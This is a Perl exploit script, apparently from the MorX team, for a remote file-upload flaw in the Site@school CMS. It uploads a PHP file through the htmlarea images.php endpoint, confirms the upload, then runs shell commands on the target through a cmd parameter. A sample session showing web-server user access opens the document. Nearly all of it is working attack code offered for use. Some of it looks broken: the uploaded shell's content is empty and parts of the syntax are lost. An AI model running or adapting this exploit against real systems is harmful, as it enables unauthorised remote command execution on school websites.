# C:\>perl school.pl localhost # --- Site@school remote file upload Xploit # --- Writting By Simo ben youssef / Simo_at_morx_org # --- MorX Security Research Team # --- www.morx.org # [*] checking if zebi.php was successfully uploaded ... # [+] zebi.php was successfully uploaded # #################################### # #### ET VOILA, YOU ARE IN ##### # #################################### # Linux localhost 2.6.12.6-xenU #1 SMP Sun Dec 4 20:49:44 GMT 2005 x86_64 GNU/Linux # uid=33(www-data) gid=33(www-data) groups=33(www-data) # [www-data@localhost:]#exit # Connection Closed use IO::Socket; use LWP::Simple; if(!defined($ARGV[0])) { print "\n--- Site\@school remote file upload Xploit\n"; print "--- Writting By Simo ben youssef / Simo_at_morx_org\n"; print "--- MorX Security Research Team\n"; print "--- www.morx.org\n\n"; print "--- Usage: perl $0 \n"; print "--- Example: perl $0 localhost\n\n"; exit; } $TARGET = $ARGV[0]; $PORT = "80"; $SCRIPT = "starnet/editors/htmlarea/popups/images.php"; $SHELL = "/starnet/media/zebi.php?cmd="; $HTTP = "http://"; $COMMAND1 = "POST /$SCRIPT HTTP/1.1"; $COMMAND2 = "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*"; $COMMAND3 = "Accept-Language: en-us"; $COMMAND4 = "Content-Type: multipart/form-data; boundary=-------- -------------------7d62e2819048c2"; $COMMAND5 = "Accept-Encoding: gzip, deflate"; $COMMAND6 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"; $COMMAND7 = "Host: $TARGET"; $COMMAND8 = "Content-Length: 438"; $COMMAND9 = "Connection: Keep-Alive"; $COMMAND9a = "Cache-Control: no-cache"; $COMMAND10 = "-----------------------------7d62e2819048c2"; $COMMAND11 = 'Content-Disposition: form-data; name="dirPath"'; $COMMAND12 = "/"; $COMMAND13 = 'Content-Disposition: form-data; name="upload"; filename="C:\zebi.php"'; $COMMAND14 = "Content-Type: application/octet-stream"; $COMMAND15 = ""; $COMMAND16 = 'Content-Disposition: form-data; name="upload"'; $COMMAND17 = "Upload"; $COMMAND18 = "-----------------------------7d62e2819048c2--"; $COMMAND19 = "HEAD /starnet/media/zebi.php HTTP/1.1"; $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT") || die "Can't connect to $TARGET"; print "\n--- Site\@school remote file upload Xploit\n"; print "--- Writting By Simo ben youssef / Simo_at_morx_org\n"; print "--- MorX Security Research Team\n"; print "--- www.morx.org\n\n"; print "[*] Trying to upload zebi.php ...\n\n"; sleep 2; print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n$COMMAND4\n$COMMAND5\n$COMMAND6\n$COMMAND7\n$COMMAND8\n$COMMAND9\n$COMMAND9a\n\n"; print $remote "$COMMAND10\n$COMMAND11\n\n$COMMAND12\n$COMMAND10\n$COMMAND13\n$COMMAND14\n\n$COMMAND15\n$COMMAND10\n$COMMAND16\n\n$COMMAND17\n$COMMAND18\n\n"; print "[*] checking if zebi.php was successfully uploaded ...\n"; print $remote "$COMMAND19\n$COMMAND7\n$COMMAND9\n$COMMAND9a\n\n"; while ($output = <$remote> ) { if ($output =~ /200 OK/) { print "[+] zebi.php was successfully uploaded\n\n"; $cmd2 = "uname -n"; $cmd3 = "whoami"; $cmd4 = "uname -a"; $cmd5 = "id"; $unamea = "$HTTP$TARGET$SHELL$cmd4"; $id = "$HTTP$TARGET$SHELL$cmd5"; $uname = "$HTTP$TARGET$SHELL$cmd2"; $whoami = "$HTTP$TARGET$SHELL$cmd3"; $w = get($whoami); $u = get($uname); chomp($w); chomp($u); $ua = get($unamea); $i = get($id); print "####################################\n"; print "#### ET VOILA, YOU ARE IN #####\n"; print "####################################\n\n"; print "$ua\n$i"; while () { print "\n[$w\@$u:]#"; chomp($cmd=); if ($cmd eq "exit") { print "Connection Closed\n"; $remote->flush(); close($remote); exit; } $LEHWA = "$HTTP$TARGET$SHELL$cmd"; if($cmd eq "") { print "empty command ! for help, type help\n"; } else { getprint($LEHWA) } } $a = 1 } } if ($a == 0) { print "[-] failed\n"; } $remote->flush(); close($remote); exit;